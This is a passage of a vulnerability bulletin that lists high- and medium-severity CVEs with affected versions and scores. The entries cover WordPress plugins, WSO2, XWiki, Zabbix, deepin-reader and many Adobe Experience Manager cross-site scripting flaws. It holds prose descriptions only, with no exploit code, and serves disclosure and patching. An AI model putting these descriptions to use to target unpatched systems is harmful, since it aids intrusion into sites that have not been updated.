wordpress — wordpressImproper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in BannerSky BSK Forms Blacklist. This issue affects BSK Forms Blacklist: from n/a through 3.6.2.2023-12-207.6CVE-2023-30872
[email protected]
wordpress — wordpressImproper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Adastra Crypto Cryptocurrency Payment & Donation Box – Accept Payments in any Cryptocurrency on your WP Site for Free. This issue affects Cryptocurrency Payment & Donation Box – Accept Payments in any Cryptocurrency on your WP Site for Free: from n/a through 2.2.7.2023-12-207.2CVE-2023-32128
[email protected]
wordpress — wordpressImproper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in WooCommerce AutomateWoo. This issue affects AutomateWoo: from n/a through 5.7.1.2023-12-207.6CVE-2023-32743
[email protected]
wordpress — wordpressImproper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in WooCommerce Product Vendors allows SQL Injection. This issue affects Product Vendors: from n/a through 2.1.76.2023-12-187.2CVE-2023-33331
[email protected]
wordpress — wordpressAuthorization Bypass Through User-Controlled Key vulnerability in WooCommerce Woo Subscriptions. This issue affects Woo Subscriptions: from n/a through 5.1.2.2023-12-207.5CVE-2023-35914
[email protected]
wordpress — wordpressImproper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Automattic WooPayments – Fully Integrated Solution Built and Supported by Woo. This issue affects WooPayments – Fully Integrated Solution Built and Supported by Woo: from n/a through 5.9.0.2023-12-207.6CVE-2023-35915
[email protected]
wordpress — wordpressAuthorization Bypass Through User-Controlled Key vulnerability in Automattic WooPayments – Fully Integrated Solution Built and Supported by Woo. This issue affects WooPayments – Fully Integrated Solution Built and Supported by Woo: from n/a through 5.9.0.2023-12-207.5CVE-2023-35916
[email protected]
wordpress — wordpressImproper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in MainWP MainWP Dashboard – WordPress Manager for Multiple Websites Maintenance. This issue affects MainWP Dashboard – WordPress Manager for Multiple Websites Maintenance: from n/a through 4.4.3.3.2023-12-207.6CVE-2023-38519
[email protected]
wordpress — wordpressDeserialization of Untrusted Data vulnerability in Themify Themify Ultra. This issue affects Themify Ultra: from n/a through 7.3.5.2023-12-207.4CVE-2023-46147
[email protected]
wordpress — wordpressDeserialization of Untrusted Data vulnerability in E2Pdf.Com E2Pdf – Export To Pdf Tool for WordPress. This issue affects E2Pdf – Export To Pdf Tool for WordPress: from n/a through 1.20.18.2023-12-197.2CVE-2023-46154
[email protected]
wordpress — wordpressImproper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Avirtum iPages Flipbook For WordPress. This issue affects iPages Flipbook For WordPress: from n/a through 1.4.8.2023-12-207.6CVE-2023-47236
[email protected]
wordpress — wordpressThe Export any WordPress data to XML/CSV WordPress plugin before 1.4.0, WP All Export Pro WordPress plugin before 1.8.6 does not validate and sanitize the `wp_query` parameter which allows an attacker to run arbitrary command on the remote server2023-12-187.2CVE-2023-4724
[email protected]
wordpress — wordpressImproper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in WPVibes Redirect 404 Error Page to Homepage or Custom Page with Logs allows SQL Injection. This issue affects Redirect 404 Error Page to Homepage or Custom Page with Logs: from n/a through 1.8.7.2023-12-187.2CVE-2023-47530
[email protected]
wordpress — wordpressImproper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Link Whisper Link Whisper Free. This issue affects Link Whisper Free: from n/a through 0.6.5.2023-12-207.2CVE-2023-47852
[email protected]
wordpress — wordpressExposure of Sensitive Information to an Unauthorized Actor vulnerability in HM Plugin WordPress Job Board and Recruitment Plugin – JobWP. This issue affects WordPress Job Board and Recruitment Plugin – JobWP: from n/a through 2.1.2023-12-217.5CVE-2023-48288
[email protected]
wordpress — wordpressImproper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in WC Vendors WC Vendors – WooCommerce Multi-Vendor, WooCommerce Marketplace, Product Vendors. This issue affects WC Vendors – WooCommerce Multi-Vendor, WooCommerce Marketplace, Product Vendors: from n/a through 2.4.7.2023-12-197.6CVE-2023-48327
[email protected]
wordpress — wordpressImproper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in QuantumCloud AI ChatBot. This issue affects AI ChatBot: from n/a through 4.7.8.2023-12-197.2CVE-2023-48741
[email protected]
wordpress — wordpressServer-Side Request Forgery (SSRF) vulnerability in Elegant Digital Solutions CommentLuv. This issue affects CommentLuv: from n/a through 3.0.4.2023-12-157.5CVE-2023-49159
[email protected]
wordpress — wordpressImproper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Younes JFR. Advanced Database Cleaner. This issue affects Advanced Database Cleaner: from n/a through 3.1.2.2023-12-197.2CVE-2023-49764
[email protected]
wordpress — wordpressThe SmartCrawl WordPress plugin before 3.8.3 does not prevent unauthorized users from accessing password-protected posts’ content.2023-12-187.5CVE-2023-5949
[email protected]
wordpress — wordpressThe Events Calendar WordPress plugin before 6.2.8.1 discloses the content of password protected posts to unauthenticated users via a crafted request2023-12-187.5CVE-2023-6203
[email protected]
wordpress — wordpressIThe Quttera Web Malware Scanner WordPress plugin before 3.4.2.1 does not validate user input used in a path, which could allow users with an admin role to perform path traversal attacks2023-12-187.2CVE-2023-6222
[email protected]
[email protected]
wordpress — wordpressThe SiteOrigin Widgets Bundle WordPress plugin before 1.51.0 does not validate user input before using it to generate paths passed to include function/s, allowing users with the administrator role to perform LFI attacks in the context of Multisite WordPress sites.2023-12-187.2CVE-2023-6295
[email protected]
wordpress — wordpressThe E2Pdf plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file type validation on the ‘import_action’ function in versions up to, and including, 1.20.25. This makes it possible for authenticated attackers with a role that the administrator previously granted access to the plugin, to upload arbitrary files on the affected site’s server which may make remote code execution possible.2023-12-157.2CVE-2023-6826
[email protected]
[email protected]
[email protected]
[email protected]
wordpress — wordpressThe Backup Migration plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 1.3.9 via the ‘content-backups’ and ‘content-name’, ‘content-manifest’, or ‘content-bmitmp’ and ‘content-identy’ HTTP headers. This makes it possible for unauthenticated attackers to delete arbitrary files, including the wp-config.php file, which can make site takeover and remote code execution possible.2023-12-237.5CVE-2023-6972
[email protected]
[email protected]
[email protected]
[email protected]
wordpress — wordpressThe Backup Migration plugin for WordPress is vulnerable to OS Command Injection in all versions up to, and including, 1.3.9 via the ‘url’ parameter. This vulnerability allows authenticated attackers, with administrator-level permissions and above, to execute arbitrary commands on the host operating system.2023-12-237.2CVE-2023-7002
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
wordpress — wordpress
 		Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in WooCommerce AutomateWoo. This issue affects AutomateWoo: from n/a through 4.9.50.2023-12-208.5CVE-2023-33330
[email protected]
wordpress — wordpress
 		Deserialization of Untrusted Data vulnerability in Rajnish Arora Recently Viewed Products. This issue affects Recently Viewed Products: from n/a through 1.0.0.2023-12-198.3CVE-2023-34027
[email protected]
wordpress — wordpress
 		Unrestricted Upload of File with Dangerous Type vulnerability in ThemePunch OHG Slider Revolution. This issue affects Slider Revolution: from n/a through 6.6.15.2023-12-208.4CVE-2023-47784
[email protected]
wordpress — wordpress
 		Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in PenciDesign Soledad – Multipurpose, Newspaper, Blog & WooCommerce WordPress Theme. This issue affects Soledad – Multipurpose, Newspaper, Blog & WooCommerce WordPress Theme: from n/a through 8.4.1.2023-12-208.5CVE-2023-49825
[email protected]
wordpress — wordpress
 		Deserialization of Untrusted Data vulnerability in PenciDesign Soledad – Multipurpose, Newspaper, Blog & WooCommerce WordPress Theme. This issue affects Soledad – Multipurpose, Newspaper, Blog & WooCommerce WordPress Theme: from n/a through 8.4.1.2023-12-218.1CVE-2023-49826
[email protected]
wordpress — wordpress
 		Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in GuardGiant Brute Force Protection WordPress Brute Force Protection – Stop Brute Force Attacks. This issue affects WordPress Brute Force Protection – Stop Brute Force Attacks: from n/a through 2.2.5.2023-12-197.6CVE-2023-48764
[email protected]
wordpress — wordpress
 		Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Guelben Bravo Translate. This issue affects Bravo Translate: from n/a through 1.2.2023-12-207.6CVE-2023-49161
[email protected]
wordpress — wordpress
 		Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Magic Logix MSync. This issue affects MSync: from n/a through 1.0.0.2023-12-207.6CVE-2023-49166
[email protected]
wordpress — wordpress
 		Deserialization of Untrusted Data vulnerability in Gordon Böhme, Antonio Leutsch Structured Content (JSON-LD) #wpsc. This issue affects Structured Content (JSON-LD) #wpsc: from n/a through 1.5.3.2023-12-197.5CVE-2023-49819
[email protected]
wso2 — multiple_productsMultiple WSO2 products have been identified as vulnerable to perform user impersonation using JIT provisioning. In order for this vulnerability to have any impact on your deployment, following conditions must be met: * An IDP configured for federated authentication and JIT provisioning enabled with the “Prompt for username, password and consent” option. * A service provider that uses the above IDP for federated authentication and has the “Assert identity using mapped local subject identifier” flag enabled. Attacker should have: * A fresh valid user account in the federated IDP that has not been used earlier. * Knowledge of the username of a valid user in the local IDP. When all preconditions are met, a malicious actor could use JIT provisioning flow to perform user impersonation.2023-12-158.5CVE-2023-6837
ed10eef1-636d-4fbe-9993-6890dfa878f8
wso2 — multiple_productsMultiple WSO2 products have been identified as vulnerable due to an XML External Entity (XXE) attack abuses a widely available but rarely used feature of XML parsers to access sensitive information.2023-12-157.5CVE-2023-6836
ed10eef1-636d-4fbe-9993-6890dfa878f8
wuhan_deepin_technology_co.,_ltd. — deepin-readerDeepin Linux’s default document reader `deepin-reader` software suffers from a serious vulnerability in versions prior to 6.0.7 due to a design flaw that leads to remote command execution via crafted docx document. This is a file overwrite vulnerability. Remote code execution (RCE) can be achieved by overwriting files like .bash_rc, .bash_login, etc. RCE will be triggered when the user opens the terminal. Version 6.0.7 contains a patch for the issue.2023-12-229.3CVE-2023-50254
[email protected]
[email protected]
[email protected]
xwiki — xwikiXWiki Platform is a generic wiki platform. Starting in 4.5-rc-1 and prior to versions 14.10.15, 15.5.2, and 15.7-rc-1, the search administration interface doesn’t properly escape the id and label of search user interface extensions, allowing the injection of XWiki syntax containing script macros including Groovy macros that allow remote code execution, impacting the confidentiality, integrity and availability of the whole XWiki instance. This attack can be executed by any user who can edit some wiki page like the user’s profile (editable by default) as user interface extensions that will be displayed in the search administration can be added on any document by any user. The necessary escaping has been added in XWiki 14.10.15, 15.5.2 and 15.7RC1. As a workaround, the patch can be applied manually applied to the page `XWiki.SearchAdmin`.2023-12-158.8CVE-2023-50721
[email protected]
[email protected]
[email protected]
xwiki — xwikiXWiki Platform is a generic wiki platform. Starting in 2.3 and prior to versions 14.10.15, 15.5.2, and 15.7-rc-1, there is a reflected XSS or also direct remote code execution vulnerability in the code for displaying configurable admin sections. The code that can be passed through a URL parameter is only executed when the user who is visiting the crafted URL has edit right on at least one configuration section. While any user of the wiki could easily create such a section, this vulnerability doesn’t require the attacker to have an account or any access on the wiki. It is sufficient to trick any admin user of the XWiki installation to visit the crafted URL. This vulnerability allows full remote code execution with programming rights and thus impacts the confidentiality, integrity and availability of the whole XWiki installation. This has been fixed in XWiki 14.10.15, 15.5.2 and 15.7RC1. The patch can be manually applied to the document `XWiki.ConfigurableClass`.2023-12-158.8CVE-2023-50722
[email protected]
[email protected]
[email protected]
xwiki — xwikiXWiki Platform is a generic wiki platform. Starting in 2.3 and prior to versions 14.10.15, 15.5.2, and 15.7-rc-1, anyone who can edit an arbitrary wiki page in an XWiki installation can gain programming right through several cases of missing escaping in the code for displaying sections in the administration interface. This impacts the confidentiality, integrity and availability of the whole XWiki installation. Normally, all users are allowed to edit their own user profile so this should be exploitable by all users of the XWiki instance. This has been fixed in XWiki 14.10.15, 15.5.2 and 15.7RC1. The patches can be manually applied to the `XWiki.ConfigurableClassMacros` and `XWiki.ConfigurableClass` pages.2023-12-158.8CVE-2023-50723
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
xwiki — xwikiXWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. It’s possible to execute a Velocity script without script right through the document tree. This has been patched in XWiki 14.10.7 and 15.2RC1.2023-12-218.3CVE-2023-50732
[email protected]
[email protected]
[email protected]
xwiki — xwikiXWiki Platform is a generic wiki platform. Starting in 7.2-milestone-2 and prior to versions 14.10.15, 15.5.2, and 15.7-rc-1, the Solr-based search in XWiki discloses the password hashes of all users to anyone with view right on the respective user profiles. By default, all user profiles are public. This vulnerability also affects any configurations used by extensions that contain passwords like API keys that are viewable for the attacker. Normally, such passwords aren’t accessible but this vulnerability would disclose them as plain text. This has been patched in XWiki 14.10.15, 15.5.2 and 15.7RC1. There are no known workarounds for this vulnerability.2023-12-157.5CVE-2023-50719
[email protected]
[email protected]
[email protected]
zabbix — zabbix-agentThe vulnerability is caused by improper check for check if RDLENGTH does not overflow the buffer in response from DNS server.2023-12-188.1CVE-2023-32726
[email protected]
zabbix — zabbix-agent2The Zabbix Agent 2 item key smart.disk.get does not sanitize its parameters before passing them to a shell command resulting possible vulnerability for remote code execution.2023-12-189.8CVE-2023-32728
[email protected]
zabbix — zabbix_serverThe website configured in the URL widget will receive a session cookie when testing or executing scheduled reports. The received session cookie can then be used to access the frontend as the particular user.2023-12-188.8CVE-2023-32725
[email protected]
zabbix — zabbix_serverAn attacker who has the privilege to configure Zabbix items can use function icmpping() with additional malicious command inside it to execute arbitrary code on the current Zabbix server.2023-12-187.2CVE-2023-32727
[email protected]

Back to top

 

Medium Vulnerabilities

Primary
Vendor — Product		DescriptionPublishedCVSS ScoreSource & Patch Info
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-47064
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser.2023-12-155.4CVE-2023-47065
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48440
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by an Improper Access Control vulnerability. An attacker could leverage this vulnerability to achieve a low-confidentiality impact within the application. Exploitation of this issue does not require user interaction.2023-12-155.3CVE-2023-48441
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48442
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser.2023-12-155.4CVE-2023-48443
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48444
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser.2023-12-155.4CVE-2023-48445
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser.2023-12-155.4CVE-2023-48446
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser.2023-12-155.4CVE-2023-48447
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser.2023-12-155.4CVE-2023-48448
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser.2023-12-155.4CVE-2023-48449
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser.2023-12-155.4CVE-2023-48450
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser.2023-12-155.4CVE-2023-48451
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser.2023-12-155.4CVE-2023-48452
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser.2023-12-155.4CVE-2023-48453
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser.2023-12-155.4CVE-2023-48454
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser.2023-12-155.4CVE-2023-48455
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser.2023-12-155.4CVE-2023-48456
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser.2023-12-155.4CVE-2023-48457
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser.2023-12-155.4CVE-2023-48458
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser.2023-12-155.4CVE-2023-48459
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser.2023-12-155.4CVE-2023-48460
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser.2023-12-155.4CVE-2023-48461
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser.2023-12-155.4CVE-2023-48462
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser.2023-12-155.4CVE-2023-48463
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser.2023-12-155.4CVE-2023-48464
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser.2023-12-155.4CVE-2023-48465
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser.2023-12-155.4CVE-2023-48466
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser.2023-12-155.4CVE-2023-48467
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser.2023-12-155.4CVE-2023-48468
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser.2023-12-155.4CVE-2023-48469
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser.2023-12-155.4CVE-2023-48470
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser.2023-12-155.4CVE-2023-48471
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser.2023-12-155.4CVE-2023-48472
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser.2023-12-155.4CVE-2023-48473
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser.2023-12-155.4CVE-2023-48474
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser.2023-12-155.4CVE-2023-48475
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser.2023-12-155.4CVE-2023-48476
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser.2023-12-155.4CVE-2023-48477
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser.2023-12-155.4CVE-2023-48478
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser.2023-12-155.4CVE-2023-48479
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser.2023-12-155.4CVE-2023-48480
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48481
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser.2023-12-155.4CVE-2023-48482
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser.2023-12-155.4CVE-2023-48483
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser.2023-12-155.4CVE-2023-48484
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser.2023-12-155.4CVE-2023-48485
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser.2023-12-155.4CVE-2023-48486
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser.2023-12-155.4CVE-2023-48487
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser.2023-12-155.4CVE-2023-48488
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser.2023-12-155.4CVE-2023-48489
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser.2023-12-155.4CVE-2023-48490
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser.2023-12-155.4CVE-2023-48491
[email protected]
